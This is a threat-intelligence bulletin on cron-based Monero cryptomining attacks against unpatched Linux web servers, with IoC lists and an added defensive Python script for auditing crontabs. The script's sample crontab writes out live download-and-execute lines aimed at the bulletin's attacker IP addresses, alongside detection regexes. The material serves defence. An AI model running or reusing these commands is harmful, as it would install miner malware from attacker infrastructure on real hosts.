
Intelligence Bulletin – When Cryptomining Attacks

February 07, 2018

Optiv has seen a continuation of attacks based on the CryptoNight miner, in this case likely mining Monero cryptocurrency for the attackers. The attacks focus on Linux hosts running unpatched versions of Apache, JBoss and WebLogic. Attackers exploit remote code execution vulnerabilities specific to those services in order to infect hosts with the mining malware. Infected hosts are configured with a cronjob that downloads the minerd ELF 64-bit executable and the configuration files needed to mine to the attacker’s wallet. Because the payload and its configuration are re-fetched on a schedule rather than dropped once, the attacker can dynamically change the address and executables to avoid detection, or migrate the attack once it is detected.


Once downloaded, the miner queries the host for available resources and starts workers based on the number of CPU cores available. Recently, we have noticed that care is being taken to limit the resources used on the infected host in order to avoid detection. In one recent case, threads were started on only half of the available cores so as not to signal unusually high utilization on the machine. Also of note, the bash scripts used by the attackers are disguised as typically non-executable file types in order to avoid network detection when downloaded.

In order to limit exposure to these threats we recommend that systems running the vulnerable services are patched, so that the initial foothold is never gained. Additionally, file integrity monitoring and/or a HIDS should report on crontab entries and modifications.
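The following Python script is an added example and is not Optiv's tooling or code from the bulletin. It demonstrates the defender-side checks the bulletin implies: refanging the defanged IoC entries (hxxp://, [.]) from the list below so they can be matched against telemetry, auditing crontab lines for download-and-execute patterns and for contact with known IoC hosts, and spotting a payload whose file name suggests a non-executable type (such as an image or a .conf file) but whose bytes are a shell script or ELF binary. The crontab lines and file contents are constructed sample input; the regular expressions are heuristics and will also match some benign jobs (for example a legitimate curl that writes to /tmp), so treat a hit as something to review rather than as proof of compromise.

```python
"""Defender-side checks for the cron-based cryptomining TTPs in the bulletin.

Added example, not Optiv's own tooling. Sample crontab lines and file
contents are constructed; the IoC entries are copied from the bulletin.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

# Defanged entries copied from the bulletin's IoC list.
BULLETIN_IOCS = [
    "hxxp://45[.]77[.]106[.]29/lowerv2[.]sh",
    "hxxp://181[.]214[.]87[.]240/res/logo[.]jp",
    "hxxp://181[.]214[.]87[.]240/res/kworker[.]conf",
    "pool[.]supportxmr[.]com",
    "minexmr[.]com",
]

# Constructed sample crontab (not real telemetry): two benign jobs, two miner-style jobs.
SAMPLE_CRONTAB = """\
MAILTO=root
*/10 * * * * root /usr/lib/apt/apt.systemd.daily
*/5 * * * * curl -fsSL http://45.77.106.29/lowerv2.sh | sh
@reboot wget -q -O /tmp/kworker http://181.214.87.240/res/logo.jp && chmod +x /tmp/kworker && /tmp/kworker
0 2 * * * /usr/bin/certbot renew --quiet
"""


def refang(ioc: str) -> str:
    """Turn 'hxxp://45[.]77[.]106[.]29/x' into 'http://45.77.106.29/x'."""
    s = ioc.strip().replace("[.]", ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)


def ioc_hosts(iocs: Iterable[str]) -> Set[str]:
    """Reduce defanged URLs/domains to a set of lower-cased hostnames or IPs."""
    hosts = set()
    for ioc in iocs:
        s = re.sub(r"^https?://", "", refang(ioc), flags=re.IGNORECASE)
        host = s.split("/", 1)[0].split(":", 1)[0].lower()
        if host:
            hosts.add(host)
    return hosts


# A cron job line starts with a shortcut (@reboot, @hourly, ...) or five schedule fields.
SCHEDULE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
# Download piped into a shell, made executable, or dropped in a world-writable scratch dir.
EXEC_HINT = re.compile(r"\|\s*(?:ba)?sh\b|chmod\s+\+x|/tmp/|/dev/shm/")
URL_HOST = re.compile(r"https?://([^/\s:]+)", re.IGNORECASE)


@dataclass
class Finding:
    line: str
    reasons: List[str]


def audit_cron_line(line: str, bad_hosts: Set[str]) -> Optional[Finding]:
    """Return a Finding if the job downloads-and-executes or contacts a known IoC host."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    m = SCHEDULE.match(stripped)
    if not m:
        return None  # environment lines such as MAILTO=... carry no command
    command = stripped[m.end():]
    reasons = []
    if DOWNLOADER.search(command) and EXEC_HINT.search(command):
        reasons.append("downloads remote content and executes it")
    hit = {h.lower() for h in URL_HOST.findall(command)} & bad_hosts
    if hit:
        reasons.append("contacts known IoC host(s): " + ", ".join(sorted(hit)))
    return Finding(stripped, reasons) if reasons else None


def audit_crontab(text: str, iocs: Iterable[str]) -> List[Finding]:
    """Audit every line of a crontab dump against the refanged IoC hosts."""
    bad_hosts = ioc_hosts(iocs)
    return [f for f in (audit_cron_line(ln, bad_hosts) for ln in text.splitlines()) if f]


# Extensions under which a shebang or ELF header is expected; anything else is a mismatch.
EXECUTABLE_EXTS = {"", ".sh", ".bash", ".bin", ".run", ".elf"}


def disguised_payload(filename: str, content: bytes) -> Optional[str]:
    """Flag a file named like a non-executable type whose bytes are a script or ELF."""
    ext = ("." + filename.rsplit(".", 1)[1].lower()) if "." in filename else ""
    if ext in EXECUTABLE_EXTS:
        return None
    head = content[:4]
    if head == b"\x7fELF":
        return f"{filename}: ELF executable served under extension {ext}"
    if head.startswith(b"#!"):
        return f"{filename}: interpreted script served under extension {ext}"
    return None


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, BULLETIN_IOCS):
        print(f"SUSPICIOUS: {f.line}\n    " + "; ".join(f.reasons))
    # Constructed contents: a shell script named like an image, an ELF named like a config file.
    for name, data in [("logo.jp", b"#!/bin/bash\n"), ("kworker.conf", b"\x7fELF\x02\x01\x01")]:
        print(disguised_payload(name, data))
```

Feed audit_crontab the output of `crontab -l` for each user plus the contents of /etc/crontab and /etc/cron.d/*, and feed disguised_payload the files a proxy or FIM tool sees being written; both return plain data rather than printing, so the same functions can sit behind a HIDS rule or a scheduled check. The host-matching step works because the IoCs are reduced to bare hosts, which means a changed path on the same attacker server (the bulletin notes attackers rotate files) still matches.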

Optiv’s gTIC assesses with HIGH confidence that malicious actors will continue to use cryptomining malware for financial gain. Additionally, we assess with HIGH confidence that financially motivated actors will focus on targets of opportunity and are potentially using tools such as Shodan to uncover vulnerable systems.

Intelligence Gaps:

  1. How will financially motivated actors continue to change TTPs for continued use of cryptomining malware?
  2. Is this an organized campaign to utilize cryptomining malware?
  3. How are malicious actors determining their targets?

A list of IOCs for the miner binaries (file hashes) and the associated network infrastructure can be found below.

Hashes

SHA-256:

  • 7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c
  • 9359f7e7b1dd0f4ce4a2c52fe611c981a3dd7a17f935862e3ce9acb5f2df8ced
  • f4864b3793c93de50b953e9751dc22e03fa0333ae6856d8d153be9018da6d911
  • d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d
  • bcf306bf3c905567ac1a5012be94fe642cac6116192cea6486730341b32b38a4
  • 0c5e960ca2a37cf383a7457bcc82e66d5b94164b12dfca1f21501211d9aca3c9
  • b3aba7582de82a0229b4d4caf73bc50cc18eb98109a0e251447dfb47afabc597
  • 0b2bd245ce62787101bc56b1eeda9f74e0f87b72781c8f50a1eff185a2a98391
  • 182812097daabfc3fe52dd485bb0a0f566ddf47f23b9d9f72c2df01a1a4faf84
  • 43f78c1c1b078f29fd5eb75759aa7b1459aa3f1679bbaabc1e67c362620650fb
  • 370109b73fa9dceea9e2b34b466d0d2560025efcc78616387d84732cbe82b6bd
  • 36524172afa85a131bf0075c7ff20dcbfb8a94c4e981300fb33ef56ed912678c
  • 348c7dd59ea1b4e88585863dd788621f1101202d32df67eb0015761d25946420
  • 198e090e86863fb5015e380dc159c5634cc2a598e93b20dd9695e1649bb062ad
  • 3b83c25a00b3820b28941d4be1583af8ed22ca20a8270c318d02e4918d7b3070

MD5:

  • 0dc34402be603f563bfb25e7c476a0b4
  • 6455ffef458df6d24dd4df37f3d6df73
  • 9eadc40299864089e8a0959d04b02b39
  • e1df71c38cea61397e713d6e580e9051

SHA-1:

  • deeb65dbf4ac5d1d0db6ac4467282f62049a3620
  • 777af085e72a4a19b6971f24c1167989335af508
  • 4f41da624726daf16e1c0034e8a6a99c790be61e
  • 9be68990dd7b071b192b89b0e384f290cce2b2db

IPs

  • 104[.]25[.]208[.]15
  • 94[.]130[.]143[.]162
  • 72[.]11[.]140[.]178
  • 88[.]99[.]142[.]163
  • 78[.]46[.]91[.]134
  • 104[.]25[.]209[.]15
  • 136[.]243[.]102[.]154
  • 136[.]243[.]102[.]167
  • 148[.]251[.]133[.]246
  • 104[.]223[.]37[.]150
  • 208[.]92[.]90[.]51
  • 45[.]77[.]106[.]29
  • 181[.]214[.]87[.]240
  • 181[.]214[.]87[.]241

Domains

  • hxxp://27[.]148[.]157[.]89:8899/1[.]exe
  • hxxp://221[.]229[.]204[.]177:8888
  • hxxp://27[.]148[.]157[.]89:8899/xmrig
  • hxxp://72[.]11[.]140[.]178/?info=l30
  • hxxp://72[.]11[.]140[.]178/files/
  • hxxp://72[.]11[.]140[.]178/?info=l69
  • hxxp://72[.]11[.]140[.]178/files/w/default
  • hxxp://27[.]148[.]157[.]89:8899/xmr64[.]exe
  • hxxp://72[.]11[.]140[.]178/?info=w0
  • hxxp://27[.]148[.]157[.]89:8899/1[.]sh
  • hxxp://72[.]11[.]140[.]178/files/w/default/auto-upgrade[.]exe
  • hxxp://72[.]11[.]140[.]178/files/w/default?info=w0
  • hxxp://www[.]luoxkexp[.]com:8520/php[.]exe
  • hxxp://72[.]11[.]140[.]178/auto-upgrade
  • hxxp://luoxkexp[.]com:8888/samba[.]exe
  • hxxp://27[.]148[.]157[.]89:8899/xmr86[.]exe
  • hxxp://27[.]148[.]157[.]89:8899/fuckpig[.]jar
  • hxxp://www[.]luoxkexp[.]com:8520/
  • hxxp://72[.]11[.]140[.]178/?info=w9
  • hxxp://72[.]11[.]140[.]178/files/w/default?info=w9
  • hxxp://luoxkexp[.]com:8888/xmr64[.]exe
  • hxxp://luoxkexp[.]com/xmr64[.]exe
  • hxxp://27[.]148[.]157[.]89:8899/112[.]exe
  • hxxp://72[.]11[.]140[.]178/files
  • hxxp://27[.]148[.]157[.]89:8899/jiba
  • hxxp://luoxkexp[.]com
  • hxxp://72[.]11[.]140[.]178/files/w/others
  • hxxp://72[.]11[.]140[.]178/setup-watch
  • hxxp://72[.]11[.]140[.]178/wls-wsat/CoordinatorPortType
  • hxxp://72[.]11[.]140[.]178/?info=l60
  • hxxp://72[.]11[.]140[.]178/files/l/default
  • hxxp://luoxkexp[.]com:8888/xmr86[.]exe
  • hxxp://luoxkexp[.]com:8899/xmr64[.]exe
  • hxxp://72[.]11[.]140[.]178/files/l/others
  • hxxp://luoxkexp[.]com:8899/1[.]exe
  • hxxp://letoscribe[.]ru/includes/libraries/files[.]tar[.]gz
  • hxxp://letoscribe[.]ru/includes/libraries/getsetup[.]php?p=wl
  • hxxp://45[.]77[.]106[.]29/selectv2[.]sh
  • hxxp://45[.]77[.]106[.]29/sourplum
  • hxxp://45[.]77[.]106[.]29/lowerv2[.]sh
  • hxxp://45[.]77[.]106[.]29/rootv2[.]sh
  • hxxp://181[.]214[.]87[.]240/res/logo[.]jp
  • hxxp://5[.]188[.]87[.]12/langs/kworker_na
  • hxxp://181[.]214[.]87[.]240/res/kworker[.]conf
  • hxxp://letoscribe[.]ru/includes/libraries/notify[.]php?p=wl
  • hxxp://104[.]223[.]37[.]150:8090
  • hxxp://k[.]zsw8[.]cc:8080
  • hxxp://i[.]zsw8[.]cc:8080
  • hxxp://pastebin[.]com/raw/rWjyEGDq
  • hxxp://208[.]92[.]90[.]51
  • hxxp://208[.]92[.]90[.]51:443
  • minergate[.]com
  • minexmr[.]com
  • letoscribe[.]ru
  • pool-proxy[.]com
  • fee[.]xmrig[.]com
  • nicehash[.]com
  • data[.]rel[.]ro
  • dkuug[.]dk
  • i[.]zsw8[.]cc
  • k[.]zsw8[.]cc
  • pool[.]supportxmr[.]com
  • pool[.]cortins[.]tk

 
